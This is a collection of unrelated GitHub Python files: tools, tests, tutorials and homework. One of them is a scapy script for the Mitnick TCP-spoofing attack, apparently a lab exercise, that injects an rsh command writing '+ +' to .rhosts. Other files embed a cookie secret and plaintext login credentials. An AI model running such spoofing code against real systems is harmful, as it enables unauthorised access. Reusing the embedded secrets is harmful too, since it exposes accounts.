print(\"2 MM-DD-YYYY\")\n print(\"3 Month DD, YYYY\")\n\n\n## create a funtion to determine if two users have overlapping dates in the same location\ndef linkUp(user1, user2):\n if not user1.location and not user2.location: # if neither users have a trip\n if user1.home == user2.home: # only linkUp if homes are the same\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} indefinetly\")\n else: # else there is no overlap\n print(f\"There is no overlapping period within {user1.name}'s and {user2.name}'s locations\")\n\n elif not user1.location and user2.location: # if only user2 has a trip\n if user1.home == user2.home: # if homes are the same, linkUp until user2 leaves\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {user2.startdate}\")\n print(f\"They will both be back in {user1.home} from {user2.enddate} indefinetly\")\n elif user1.home == user2.location: # if user2's trip is to user1's home, linkUp for duration of user2's trip\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} from {user2.startdate} to {user2.enddate}\")\n else: # else there is no overlap\n print(f\"There is no overlapping period within {user1.name}'s and {user2.name}'s locations\")\n\n elif user1.location and not user2.location: # if only user1 has a trip\n if user1.home == user2.home: # if homes are the same, linkUp until user1 leaves\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {user1.startdate}\")\n print(f\"They will both be back in {user1.home} from {user1.enddate} indefinetly\")\n elif user2.home == user1.location: # if user1's trip is to user2's home, linkUp for duration of user1's trip\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} from {user1.startdate} to {user1.enddate}\")\n else: # else there is no overlap\n print(f\"There is no overlapping period within {user1.name}'s and {user2.name}'s locations\")\n\n elif user1.location and user2.location: # if both users have a trip\n earliest_start = min(user1.startdate, user2.startdate)\n latest_start = max(user1.startdate, user2.startdate) \n earliest_end = min(user1.enddate, user2.enddate) \n latest_end = max(user1.enddate, user2.enddate) \n if user1.home == user2.home and user1.location != user2.location: # if home location is the same but not trip location, linkUp until first user to leave \n if latest_start < earliest_end:\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {earliest_start}\")\n print(f\"They will both be back in {user1.home} from {latest_end} indefinetly\")\n elif latest_start > earliest_end:\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {earliest_start}\")\n print(f\"They will both be back in {user1.home} from {earliest_end} to {latest_start}\")\n print(f\"They will both be back in {user1.home} from {latest_end} indefinetly\")\n else:\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {earliest_start}\")\n print(f\"They just missed each other on {latest_start}\")\n print(f\"They will both be back in {user1.home} from {latest_end} indefinetly\")\n\n elif user1.home == user2.home and user1.location == user2.location: # if home location and trip location is the same\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} until {earliest_start}\")\n if latest_start < earliest_end:\n print(f\"They will both be in {user1.location} from {latest_start} to {earliest_end}\")\n elif latest_start > earliest_end:\n print(f\"They will both be back in {user1.home} from {earliest_end} to {latest_start}\")\n else:\n print(f\"They just misses each other on {latest_start}\")\n print(f\"and finally will both be in {user1.home} from {earliest_start} indefinetly\")\n\n elif user1.home == user2.location and user2.home == user1.location: # if user1's trip is to user2's home and if user2's trip is to user1's home\n if user1.enddate < user2.startdate:\n print(f\"{user1.name} and {user2.name} will both be in {user1.location} from {earliest_start} to {earliest_end}\")\n print(f\"They will both be in {user2.location} from {latest_start} to {latest_end}\")\n elif user2.enddate < user1.startdate:\n print(f\"{user1.name} and {user2.name} will both be in {user2.location} from {earliest_start} to {earliest_end}\")\n print(f\"They will both be in {user1.location} from {latest_start} to {latest_end}\")\n\n if user1.startdate > user2.startdate and user1.startdate < user2.enddate:\n print(f\"{user1.name} and {user2.name} will both be in {user1.home} from {earliest_start} to {latest_start}\")\n elif user2.startdate > user1.startdate and user2.startdate < user1.enddate:\n print(f\"{user1.name} and {user2.name} will both be in {user2.home} from {earliest_start} to {latest_start}\")\n elif user1.startdate == user2.startdate:\n print(f\"They just misses each other on {earliest_start}\")\n \n if user1.enddate < user2.enddate and user1.enddate > user2.startdate:\n print(f\"They will both be in {user1.home} from {earliest_end} to {latest_end}\")\n elif user2.enddate < user1.enddate and user2.enddate > user1.startdate:\n print(f\"They will both be in {user1.location} from {earliest_end} to {latest_end}\") \n elif user1.enddate == user2.enddate:\n print(f\"They just misses each other on {latest_end}\") \n \n elif user1.home != user2.home and user1.location == user2.location: # if trip location is the same but not home\n if latest_start < earliest_end:\n print(f\"{user1.name} and {user2.name} will both be in {user1.location} from {latest_start} to {earliest_end}\")\n elif latest_start > earliest_end:\n print(f\"There is no overlapping time within {user1.name}'s and {user2.name}'s locations\")\n else:\n print(f\"They just misses each other on {latest_start}\")\n\n else: # if home location and trip location is not the same\n print(f\"There is no overlapping time within {user1.name}'s and {user2.name}'s locations\")\n \ndef is_correct(question, var):\n while True: # loop until user confirms or denies\n response = input(question).upper()\n if response == \"Y\": # if confirmed, continue\n return var\n elif response == \"N\": # if denied, reset end date\n return None\n else:\n print(\"Invalid response\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"DylanMarn/LinkUp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8827936438","text":"#!usr/bin/python3\nfrom scapy.all import *\nimport sys\nX_IP_Address = \"10.9.0.3\"\nX_Tml_PortNo = 512\nX_Tml_PortNo_2 = 1021\nTrusted_IP_Address = \"10.9.0.4\"\nTrusted_PortNo = 1021\nTrusted_PortNo_2 = 9088\n\ndef spoof_pkt(pkt):\n\tsequence_no = 647862699 + 1\n\tprevious_ip = pkt[IP]\n\tprevious_tcp = pkt[TCP]\n\ttcp_length = previous_ip.len - previous_ip.ihl*4 - previous_tcp.dataofs*4\n\tprint(\"{}:{} -> {}:{} Flags={} Len={}\".format(previous_ip.src, previous_tcp.sport,\n\t\tprevious_ip.dst, previous_tcp.dport, previous_tcp.flags, tcp_length))\n\n\tif previous_tcp.flags == \"SA\":\n\t\tprint(\"Sending Spoofed ACK Packet ...\")\n\t\tIPLayer = IP(src=Trusted_IP_Address, dst=X_IP_Address)\n\t\tTCPLayer = TCP(sport=Trusted_PortNo,dport=X_Tml_PortNo,flags=\"A\",\n\t\t seq=sequence_no, ack= previous_ip.seq + 1)\n\t\tpkt = IPLayer/TCPLayer\n\t\tsend(pkt,verbose=0)\n\t\t# After sending ACK packet\n\t\tprint(\"Sending Spoofed RSH Data Packet ...\")\n\t\tdata = '9088\\x00seed\\x00seed\\x00echo + + > .rhosts\\x00'\n\t\tpkt = IPLayer/TCPLayer/data\n\t\tsend(pkt,verbose=0)\n\n\tif previous_tcp.flags == 'S' and previous_tcp.dport == Trusted_PortNo_2 and previous_ip.dst == Trusted_IP_Address:\n\t\tsequence_num = 110086204\n\t\tprint(\"Sending Spoofed SYN+ACK Packet for 2nd Connection...\")\n\t\tIPLayer = IP(src=Trusted_IP_Address, dst=X_IP_Address)\n\t\tTCPLayer = TCP(sport=Trusted_PortNo_2,dport=X_Tml_PortNo_2,flags=\"SA\",\n\t\t seq=sequence_num, ack= previous_ip.seq + 1)\n\t\tpkt = IPLayer/TCPLayer\n\t\tsend(pkt,verbose=0)\n\ndef spoofing_SYN():\n\tprint(\"Sending Spoofed SYN Packet ...\")\n\tIPLayer = IP(src=\"10.9.0.4\", dst=\"10.9.0.3\")\n\tTCPLayer = TCP(sport=1021,dport=512,flags=\"S\", seq=647862699)\n\tpkt = IPLayer/TCPLayer\n\tsend(pkt,verbose=0)\n\ndef main():\n\tspoofing_SYN()\n\tpkt = sniff(filter=\"tcp and src host 10.9.0.3\", prn=spoof_pkt)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Deepak1297/TopGun_NDS","sub_path":"MitNick Attack/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15675508982","text":"#coding=utf-8\n#main.py\nimport tornado.autoreload\nimport tornado.httpserver\nimport tornado.options\nimport tornado.ioloop\nimport tornado.web\nimport os.path\nimport config\n\nfrom controller import servers, app, business, idc, isp, user\n\nfrom tornado.options import define, options\ndefine(\"p\", default=8000, type=int)\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n (r\"/\", servers.IndexHandler),\n (r\"/server/(\\d+)/\", servers.AddHandler),\n (r\"/server/add/\", servers.AddHandler),\n (r\"/server/remove/\", servers.RemoveHandler),\n (r\"/login/\", user.LoginHandler),\n (r\"/logout/\", user.LogoutHandler),\n (r\"/business/\", business.IndexHandler),\n (r\"/business/add/\", business.AddHandler),\n (r\"/business/remove/\", business.RemoveHandler),\n (r\"/app/\", app.IndexHandler),\n (r\"/app/add/\", app.AddHandler),\n (r\"/app/remove/\", app.RemoveHandler),\n (r\"/idc/\", idc.IndexHandler),\n (r\"/idc/add/\", idc.AddHandler),\n (r\"/idc/remove/\", idc.RemoveHandler),\n (r\"/isp/\", isp.IndexHandler),\n (r\"/isp/add/\", isp.AddHandler),\n (r\"/isp/remove/\", isp.RemoveHandler),\n (r\"/user/\", user.IndexHandler),\n (r\"/user/add/\", user.AddHandler),\n (r\"/user/remove/\", user.RemoveHandler),\n (r\"/user/resetpasswd/\", user.ResetpasswdHandler),\n ]\n self.config = config\n settings = {\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n \"template_path\": os.path.join(os.path.dirname(__file__), \"templates\"),\n \"cookie_secret\": \"61oETzKXQAKaYdkL5gEmHeJJFaYh7Ecnp2XdiP1o/Vo=\",\n \"login_url\": \"/login/\",\n }\n tornado.web.Application.__init__(self, handlers, debug=False, **settings)\n\n\nif __name__ == '__main__':\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(Application())\n http_server.listen(options.p)\n tornado.ioloop.IOLoop.instance().start()\n\n","repo_name":"editpne/server_manage","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31666751979","text":"from __future__ import annotations\r\n\r\nimport os\r\nimport ast\r\nimport sys\r\nimport argparse\r\nfrom srutil import util\r\nfrom typing import Any\r\n\r\nfrom . import File, __version__, __package__\r\n\r\n\r\ndef _epilog() -> str:\r\n return \"\"\"-w/--write function may return error as it expects data in specific datatype. \r\n Writing files using commandline isn't recommended.\"\"\"\r\n\r\n\r\ndef get_argument() -> argparse.Namespace:\r\n parser = argparse.ArgumentParser(prog=__package__, usage=util.stringbuilder(__package__, \" [options]\"),\r\n epilog=_epilog())\r\n parser.add_argument('-v', '--version', action='version', help='show version number and exit.', version=__version__)\r\n group = parser.add_argument_group(\"to read/write files\")\r\n group.add_argument(\"path\", type=str, help=\"path to read/write\")\r\n group.add_argument(\"-r\", \"--read\", dest=\"read\", default=False, action=\"store_true\", help=\"to read file\")\r\n group.add_argument(\"-w\", \"--write\", dest=\"write\", default=False, action=\"store_true\", help=\"to write file\")\r\n group.add_argument(\"-d\", \"--data\", metavar='', help=\"data to write\")\r\n group.add_argument(\"-f\", \"--format\", dest='format', metavar='', choices=['csv', 'json', 'parquet', 'text', 'toml'],\r\n type=str, required=False, help=\"file format to use\")\r\n group.add_argument(\"-m\", \"--mode\", dest=\"mode\", metavar='', default=None, help=\"mode to open file\")\r\n group.add_argument(\"--rfv\", dest=\"rfv\", default=False, action=\"store_true\",\r\n help=\"will return formatted string (CSV only)\")\r\n parser.add_argument_group(group)\r\n options = parser.parse_args()\r\n if not options.format:\r\n _ext = list(os.path.splitext(options.path)).pop()\r\n _format = {\".csv\": \"csv\", \".json\": \"json\", \".parquet\": \".parquet\", \".toml\": \"toml\", \".txt\": \"text\"}\r\n if _ext not in _format:\r\n parser.error(\"the following arguments are required: -f/--format\")\r\n else:\r\n options.format = _format.get(_ext)\r\n if not options.read and not options.write:\r\n parser.error(\"one of the following arguments are required: -r/--read or -w/--write\")\r\n if options.read and options.write:\r\n parser.error(\"any one of the following arguments should be given: -r/--read or -w/--write\")\r\n if options.write and not options.data:\r\n parser.error(\"the following arguments are required: -d/--data\")\r\n return options\r\n\r\n\r\ndef _get_data(_data: str, _format: str) -> Any:\r\n return _data if _format == 'text' else ast.literal_eval(_data)\r\n\r\n\r\ndef main():\r\n options = get_argument()\r\n mode = options.mode if options.mode else None\r\n if options.read:\r\n print(File.read(options.path, _format=options.format, mode=mode, _rfv=options.rfv))\r\n elif options.write:\r\n data = _get_data(options.data, options.format)\r\n print(File.write(data, options.path, _format=options.format, mode=mode))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sys.exit(main())\r\n","repo_name":"codesrg/ioutil","sub_path":"ioutil/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7244024017","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\npayload = {'email': '29741', 'senha': 'DI3dyM'}\nurl = 'https://sistema.education1.com.br/rds/aluno/autenticar'\nr = requests.post(url, data=payload)\n\nsoup = BeautifulSoup(requests.get(url).content, 'html.parser')\n\nlista_noticias = soup.find_all('table',class_='espaco')\n\nprint(lista_noticias)\n\nprint (r.content)","repo_name":"gabrielserratg/programming","sub_path":"Python-TarefaKeep/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"48337074653","text":"import unittest\n\nimport beanmachine.ppl as bm\nimport torch\nimport torch.distributions as dist\n\n\nclass SingleSiteUniformMetropolisHastingsTest(unittest.TestCase):\n class SampleBernoulliModel(object):\n @bm.random_variable\n def foo(self):\n return dist.Beta(torch.tensor(2.0), torch.tensor(2.0))\n\n @bm.random_variable\n def bar(self):\n return dist.Bernoulli(self.foo())\n\n class SampleCategoricalModel(object):\n @bm.random_variable\n def foo(self):\n return dist.Dirichlet(torch.tensor([0.5, 0.5]))\n\n @bm.random_variable\n def bar(self):\n return dist.Categorical(self.foo())\n\n def test_single_site_uniform_mh_with_bernoulli(self):\n model = self.SampleBernoulliModel()\n mh = bm.SingleSiteUniformMetropolisHastings()\n foo_key = model.foo()\n bar_key = model.bar()\n sampler = mh.sampler([foo_key], {bar_key: torch.tensor(0.0)}, num_samples=5)\n for world in sampler:\n self.assertTrue(foo_key in world)\n self.assertTrue(bar_key in world)\n self.assertTrue(foo_key in world.get_variable(bar_key).parents)\n self.assertTrue(bar_key in world.get_variable(foo_key).children)\n\n def test_single_site_uniform_mh_with_categorical(self):\n model = self.SampleCategoricalModel()\n mh = bm.SingleSiteUniformMetropolisHastings()\n foo_key = model.foo()\n bar_key = model.bar()\n sampler = mh.sampler([foo_key], {bar_key: torch.tensor(0.0)}, num_samples=5)\n for world in sampler:\n self.assertTrue(foo_key in world)\n self.assertTrue(bar_key in world)\n self.assertTrue(foo_key in world.get_variable(bar_key).parents)\n self.assertTrue(bar_key in world.get_variable(foo_key).children)\n","repo_name":"facebookresearch/beanmachine","sub_path":"tests/ppl/inference/single_site_uniform_mh_test.py","file_name":"single_site_uniform_mh_test.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":259,"dataset":"github-code","pt":"77"} +{"seq_id":"37479161457","text":"# python里存入数据只支持存入 字符串 和 二进制\n# json:将Python里的数据(str/list/tuple/dict/int/float/bool/None)等转换成为对应的json字符串\n# pickle:将Python里任意的对象转换成为二进制\n\nimport pickle\n\n# 序列化 dumps: 将Python数据转换成为二进制\n# dump: 将Python数据转换成为二进制,同时保存到指定文件\n# 反序列化 loads: 将二进制加载成为Python数据\n# load: 读取文件,并将文件的成为二进制内容加载成为Python数据\nnames = ['张三', '李四', '杰克', '亨利']\n\n\n# b_names = pickle.dumps(names)\n# # print(b_names)\n#\n# file = open('names.txt', 'wb')\n# file.write(b_names) # 写入的是二进制,不是纯文本\n# file.close()\n#\n# file1 = open('names.txt', 'rb')\n# x = file1.read()\n# y = pickle.loads(x)\n# print(y)\n# file1.close()\n\n# file2 = open('names.txt', 'wb')\n# pickle.dump(names, file2)\n# file2.close()\n#\n# file3 = open('names.txt', 'rb')\n# y = pickle.load(file3)\n# print(y)\n#\nclass Dog(object):\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def eat(self):\n print(self.name + '正在吃东西')\n\n\nd = Dog('大黄', 2)\npickle.dump(d, open('dog.txt', 'wb'))\nd1 = pickle.load(open('dog.txt', 'rb'))\nprint(d1.name, d1.age)\nd1.eat()\n\n\"\"\"\npickle 和 json 区别?什么情况下使用json,什么情况下使用pickle?\n\n1.pickle 用来将数据原封不动的转换成为二进制,但是这个二进制只能在Python 里识别;\n2.json 只能保存一部分信息,作用是用来在不同的平台里传递数据,json里存储的数据都是基本的数据类型\n\"\"\"\n","repo_name":"Frecy16/learning","sub_path":"py_study/fileOpera/10、pickle的使用.py","file_name":"10、pickle的使用.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6056867843","text":"print('Please enter two number!')\r\nnum1=input('\\nenter first integer:')\r\nnum2=input('\\nenter second integer:')\r\nnum1=int(num1)\r\nnum2=int(num2)\r\nif num1 > num2:\r\n print('\\nfirst is greater than second')\r\nelse:\r\n print('\\nfirst is not greater than second')\r\nprint('\\All done!')\r\n\r\n\r\n","repo_name":"cyhr-0621/python-self-study","sub_path":"选择语句/if-else的双分支选择.py","file_name":"if-else的双分支选择.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74449595447","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport math\nimport pyperclip as pc\n\n#решение задачи\ndef calc(): #решалка задания\n driver.find_element(By.CLASS_NAME, 'form-control').send_keys(\n str(math.log(abs(12 * math.sin(int(\n driver.find_element(By.ID, 'input_value').text))))))\n driver.find_element(By.ID, \"solve\").click()\n stepikCalc()\n\ndef stepikCalc():\n pc.copy(driver.switch_to.alert.text.split(': ')[-1]) # сохранить в буфер калькуляцию\n\ndef returnTextInElement(BySearch, element, text, time):\n if BySearch == 'id' or 'ID': #ждем когда текст будет 100 в прайсе\n return WebDriverWait(driver, time).until(EC.text_to_be_present_in_element((By.ID, element), text))\n\ntry:\n link = \"http://suninjuly.github.io/explicit_wait2.html\"\n driver = webdriver.Chrome('E:\\Selenium\\chromedriver.exe')\n driver.implicitly_wait(5)\n driver.get(link)\n\n returnTextInElement('ID', 'price', '100', 15)\n driver.find_element(By.ID, 'book').click()\n calc()\n\nfinally:\n time.sleep(5)\n driver.quit()","repo_name":"PyZNik/stepik_auto_tests_course","sub_path":"2,4-8.py","file_name":"2,4-8.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18726512289","text":"import csv\nimport multiprocessing\nimport os\nfrom datetime import datetime\nimport pytz\n\nimport pandas as pd\n\nimport requests\nfrom xml.etree import ElementTree\n\n\nclass Vacancy:\n \"\"\"Класс для представления вакансии\n\n Attributes:\n name (str): Название вакансии\n salary_currency (str): Валюта зарплаты\n date (datetime): Дата публикации\n \"\"\"\n currency_to_rub = {\n \"AZN\": 35.68, \"BYR\": 23.91, \"EUR\": 59.90, \"GEL\": 21.74, \"KGS\": 0.76,\n \"KZT\": 0.13, \"RUR\": 1, \"UAH\": 1.64, \"USD\": 60.66, \"UZS\": 0.0055,\n }\n\n def __init__(self, vacancy):\n \"\"\"Конструктор объекта вакансий\n\n :param dict vacancy: Словарь вакансии\n \"\"\"\n self.name = vacancy['name']\n self.salary_currency = vacancy['salary_currency']\n self.date = datetime.strptime(vacancy['published_at'], '%Y-%m-%dT%H:%M:%S%z')\n\n\nclass StatsContainer:\n \"\"\"Класс для объединения объектов статистики\n\n Attributes:\n stats (list): Объекты статистики\n \"\"\"\n\n def __init__(self):\n self.stats = []\n self.old_date = datetime(2022, 12, 22, tzinfo=pytz.UTC)\n self.new_date = datetime(1970, 1, 1, tzinfo=pytz.UTC)\n\n def write(self, stat_list):\n self.stats = stat_list\n\n for s in self.stats:\n if s.old_date < self.old_date: self.old_date = s.old_date\n if s.new_date > self.new_date: self.new_date = s.new_date\n\n def get_count(self):\n temp = {}\n for s in self.stats:\n d = s.get_count()\n for k, v in d.items():\n if k in temp.keys(): temp[k] += v\n else: temp[k] = v\n temp = dict(sorted(temp.items(), key=lambda item: item[1], reverse=True))\n return {k: v for k, v in temp.items() if v > 5000 and k != 'RUR'}\n\n def print_statistics(self, output='date_dinamics.csv'):\n currencies = self.get_count().keys()\n date_list = pd.date_range(self.old_date, self.new_date, freq='M')\n info = pd.DataFrame({\n 'date': date_list.strftime('%Y-%m').tolist(),\n })\n for v in currencies:\n info[v] = 0\n for i, date in enumerate(date_list.strftime('%d/%m/%Y').tolist()):\n response = requests.get('http://www.cbr.ru/scripts/XML_daily.asp?date_req={}'.format(date))\n root = ElementTree.fromstring(response.content)\n for v in currencies:\n for item in range(len(root)):\n if root[item][1].text == v:\n info.at[i, v] = float(root[item][4].text.replace(\",\", \".\")) / float(\n root[item][2].text.replace(\",\", \".\"))\n break\n if root[item][1].text == 'BYN':\n info.at[i, 'BYR'] = float(root[item][4].text.replace(\",\", \".\")) / float(\n root[item][2].text.replace(\",\", \".\"))\n info.to_csv(output)\n\n\nclass Statistic:\n \"\"\"Класс для представления статистики\n\n Attributes:\n salary_currency (dict): Количество каждой вадюты\n \"\"\"\n def __init__(self):\n \"\"\"Конструктор класса статистики\"\"\"\n self.salary_currency = {}\n self.old_date = datetime(2022, 12, 22, tzinfo=pytz.UTC)\n self.new_date = datetime(1970, 1, 1, tzinfo=pytz.UTC)\n\n def write(self, vacancy):\n \"\"\"Заполение статистики\n\n :param Vacancy vacancy: Вакансия\n \"\"\"\n if vacancy.salary_currency in self.salary_currency:\n self.salary_currency[vacancy.salary_currency] += 1\n else:\n self.salary_currency[vacancy.salary_currency] = 1\n\n if vacancy.date < self.old_date: self.old_date = vacancy.date\n if vacancy.date > self.new_date: self.new_date = vacancy.date\n\n def get_count(self):\n return dict(sorted(self.salary_currency.items(), key=lambda item: item[1], reverse=True))\n\n\nclass DataSet:\n \"\"\"Дата-сет для работы с таблицей\n Attributes:\n file_name (str): Название файла\n \"\"\"\n def __init__(self, file_name):\n \"\"\"Конструктор класса DataSet\n\n :param str file_name: Название файла\n \"\"\"\n self.file_name = file_name\n\n def csv_reader(self):\n \"\"\"Читает CSV файл\"\"\"\n with open(self.file_name, mode='r', encoding='utf-8-sig') as file:\n reader = csv.reader(file)\n header = next(reader)\n header_length = len(header)\n for row in reader:\n if row[3] != '' and len(row) == header_length:\n yield dict(zip(header, row))\n\n def get_statistic(self):\n \"\"\"Получить статистические данные\n\n :return Statistics: Статистика\n \"\"\"\n statistics = Statistic()\n\n for vacancy in self.csv_reader():\n statistics.write(Vacancy(vacancy))\n\n return statistics\n\n\nclass InputConnect:\n \"\"\"Начальная точка программы. Объединяет всю логику программы\n\n Attributes:\n file_name (str): Название файла\n \"\"\"\n def __init__(self, fn=None):\n \"\"\"\n Начало работы программы\n \"\"\"\n self.file_name = fn\n if fn is None:\n self.file_name = input('Введите название файла: ')\n\n files = [self.file_name + \"/\" + f for f in os.listdir(self.file_name)]\n\n self.container = StatsContainer()\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\n pool.map_async(self.generate_statistic, files, callback=self.on_end_pool)\n pool.close()\n pool.join()\n\n def generate_statistic(self, filename):\n \"\"\"Таск для многопотока\n\n :param filename: Название файла\n :return: Статистика одного года\n \"\"\"\n dataset = DataSet(filename)\n return dataset.get_statistic()\n\n def on_end_pool(self, response):\n \"\"\"Коллбэк по окончанию работы\n\n :param response: ответ\n :return:\n \"\"\"\n self.container.write(response)\n print(self.container.get_count())\n self.container.print_statistics()\n\n\nif __name__ == '__main__': InputConnect(\"chunks2\")\n","repo_name":"WheatleyHDD/tp-project","sub_path":"currency_stats.py","file_name":"currency_stats.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39115560970","text":"from odoo import fields, models\n\n\nclass MailMessage(models.Model):\n _inherit = 'mail.message'\n\n message_body = fields.Html()\n stage = fields.Selection([('stage_01', 'Stage 01'), ('stage_02', 'Stage 02')], default='stage_01')\n\n def create_message(self, data):\n message = \"\"\n if data:\n message = \"• %s: %s → %s\" % (\n data.get('changed_field', ''), data.get('old_value', ''), data.get('new_value', ''))\n return message\n\n def message_format(self, format_reply=True):\n for rec in self:\n res_ = super(MailMessage, rec).message_format()\n if res_ and res_[0].get('tracking_value_ids'):\n if res_[0]['model'] in ['sale.operation', 'sale.operation.child']:\n rec.message_body = rec.create_message(res_[0]['tracking_value_ids'][0])\n return super(MailMessage, self).message_format(format_reply)\n\n def create(self, vals):\n if isinstance(vals, dict) and vals.get('model') in ['sale.operation', 'sale.operation.child']:\n vals.update({'stage': self._context.get('stage', 'stage_01')})\n if isinstance(vals, list):\n for val in vals:\n if val.get('model') in ['sale.operation', 'sale.operation.child']:\n val.update({'stage': self._context.get('stage', 'stage_01')})\n return super(MailMessage, self).create(vals)\n","repo_name":"Choreograph-Lille/OdooConex","sub_path":"maas-addons/maas_base/models/mail_message.py","file_name":"mail_message.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29323869629","text":"def reqPhoneNumber():\n while True:\n phoneNumber = input(\"Ingresa el numero de teléfono: \")\n try:\n if len(phoneNumber) == 8:\n return int(phoneNumber)\n else:\n print(\"Debes ingresar un numero de 8 dígitos. \\nInténtalo de unuevo \\n\")\n except ValueError:\n print(\"Debes ingresar un número entero. \\nInténtalo de unuevo \\n\")\n\ndef reqHourNumber():\n while True:\n hourNumber = input(\"Ingresa la hora de la llamada: \")\n try:\n hourNumber = int(hourNumber)\n if hourNumber >= 0 and hourNumber <= 23 :\n return int(hourNumber)\n else:\n print(\"Debes ingresar un numero entre 0 y 24. \\nInténtalo de unuevo \\n\")\n except ValueError:\n print(\"Debes ingresar un número entero entre 0 y 24. \\nInténtalo de unuevo \\n\")\n\ndef getLastNumber(number, qtynumber):\n return number % (10**qtynumber)\n\ndef getFirstNumber(number, qtynumber):\n return int(number / (10**(int(len(str(number)))-qtynumber)))\n\nphoneNumber = reqPhoneNumber()\nhourNumber = reqHourNumber()\n\nif hourNumber >=0 and hourNumber <= 7:\n print(\"Resultado: CONTESTAR\")\nelif hourNumber < 14:\n if getLastNumber(phoneNumber,3) == 909:\n print(getLastNumber(phoneNumber,3))\n print(\"Resultado: CONTESTAR\")\n else:\n print(getLastNumber(phoneNumber,3))\n print(\"Resultado: NO CONTESTAR\")\nelif hourNumber >=17 and hourNumber <= 19: \n if getFirstNumber(phoneNumber,3) == 877:\n print(getFirstNumber(phoneNumber,3))\n print(\"Resultado: NO CONTESTAR\")\n else:\n print(getFirstNumber(phoneNumber,3))\n print(\"Resultado: CONTESTAR\")\nelse:\n print(\"Resultado: NO CONTESTAR\")","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej2/hito1_ej2_d4198d0f164e6ab66bad06de0bcb726a.py","file_name":"hito1_ej2_d4198d0f164e6ab66bad06de0bcb726a.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21599809005","text":"from heapq import heappush, heappop\nfrom bisect import bisect_left\nfrom collections import deque\n\nt = int(input())\nfor _ in range(t):\n n,m = [int(i) for i in input().split()]\n A = [int(i) for i in input().split()]\n A = [(A[i], -i) for i in range(n*m)]\n A.sort(reverse=True)\n print(A)\n que = deque()\n a = 0\n inconv = 0\n nxt = []\n for i in range(n):\n order = []\n pe = -1\n for j in range(m):\n if not que:\n print(nxt)\n if nxt:\n for k in range(len(nxt)-1,-1,-1):\n que.appendleft(nxt[k])\n nxt = nxt[:len(nxt)-(m-j)-1]\n else:\n ev = A[a][0]\n while a < len(A) and A[a][0] == ev:\n que.append((-A[a][1], A[a][0]))\n a += 1\n while len(que) > m-j:\n nxt.append(que.popleft())\n index,eye = que.popleft()\n order.append(index)\n print(order)\n tmp = []\n for i in range(m-1,-1,-1):\n ind = bisect_left(tmp, order[i])\n inconv += ind\n tmp.insert(ind, order[i])\n print(inconv)","repo_name":"Programmerryoki/Competitive-Programming","sub_path":"CodeForces/Codeforces Global Round 16/D1.py","file_name":"D1.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"70788879930","text":"import streamlit as st\r\nimport folium\r\nfrom streamlit_folium import st_folium\r\nfrom functions.login import get_loginform\r\nfrom functions.pagesetup import set_title, set_page_overview\r\nfrom functions.supabase import get_data_sensors\r\nfrom folium import Popup # Import the Popup class\r\nimport pandas as pd\r\n\r\nst.set_page_config(layout=\"wide\", initial_sidebar_state=\"collapsed\")\r\n\r\nif 'authenticated' not in st.session_state:\r\n get_loginform()\r\nelif not st.session_state.authenticated:\r\n get_loginform()\r\nelse:\r\n set_title(\"FEOC\", \"Analytics Panel\")\r\n set_page_overview(\"Overview\", \"View **real-time**, **operational**, and **financial** dashboards.\")\r\n \r\n container1 = st.container()\r\n with container1:\r\n \r\n dfSensors = get_data_sensors()\r\n US_center = (39.8283, -98.5795)\r\n map = folium.Map(location=US_center, zoom_start=4)\r\n for _, sensor in 